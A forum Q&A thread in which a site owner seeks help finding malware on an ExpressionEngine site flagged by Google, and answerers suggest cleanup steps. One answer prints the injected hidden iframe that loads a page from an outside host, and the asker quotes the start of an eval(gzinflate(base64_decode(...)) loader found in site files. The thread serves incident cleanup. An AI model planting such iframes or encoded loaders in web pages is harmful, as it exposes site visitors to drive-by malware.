# tracking down malware in expression engine

Tags: control-panel

I am getting a malware warning from google but I can’t track down how to access these files/pages. not in the ftp or in the CMS.  can anyone tell me were I should look?

http://www.tsgw.org/index.php?/member/email_console/191/

http://www.tsgw.org/index.php?/member/icq_console/416/

Comment: thats the thing, I went through the modules/member folder and did not find any injected code. where would I find it then ? I found some others....in the default.php files there is eval(gzinflate(base64_decode(.... is that not supposed to be there?

Comment: yes it can be encoded. it probably is. http://aw-snap.info/articles/spam-hacks.php

Answer (score 1):

Google's diagnostic page for that site [reveals some additional details](http://google.com/safebrowsing/diagnostic?tpl=safari&site=www.tsgw.org&hl=en-us). When I curl the page (not visiting it in my web browser to avoid any JavaScript or malicious client scripts from executing), I can see that there is an iframe injected  at the bottom of the page just before the closing `</body>` tag:

```
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://plansweightloss.com/hewd.html?i=1885560></iframe></body>
```

It appears to be on ALL of your member pages, so I would look in your member theme templates first.

Answer (score 0):

first steps would be to check your htaccess file(s) to see if anything strange is there. next check if there are any files or folders that shouuldn't be there.
take specific care to files and folders that are 777

are you on shared hosting? You might want to contact your provider to see if they have any records of unwanted access or sql injections

Comment: checked the htaccess, but there was nothing strange there....yes on shared hosting.  will check with hosting but do you know where I can find those urls in the control panel or in the ftp?

Comment: youcould try to download all files to your local machine, and search all the files for the iframe code Derek posted below. remove all those lines (good chance it's on more places than what you've found thusfar. My guess it's injected before every </body> tag. It sounds a bit like a joomla pharma hack to me https://www.google.nl/search?q=joomla+pharma+hack&ie=utf-8&oe=utf-8&gws_rd=cr&ei=_KmjVM2bMsP6PKD3gJAC

Answer (score 0):

These links are to your member templates. As Derek says  get in there and check them out, it seems someone has managed to edit them...

Do you use the default member templates in your implimentation? If not you may be safest just deleting all the member templates from the server, otherwise someone with an account might be doing things you never even realised.

You can see the member template sif you goto /member and log in.

To delete them (I doubt this is best practice but it will remove the offending pages) take a gander in /themes/profile_system. there are 2 folders in here that contain a myriad of 'member area' default templates that could allow users to much about. If you dleete them you can't use them (obviously) but you won't get those errors again!!!!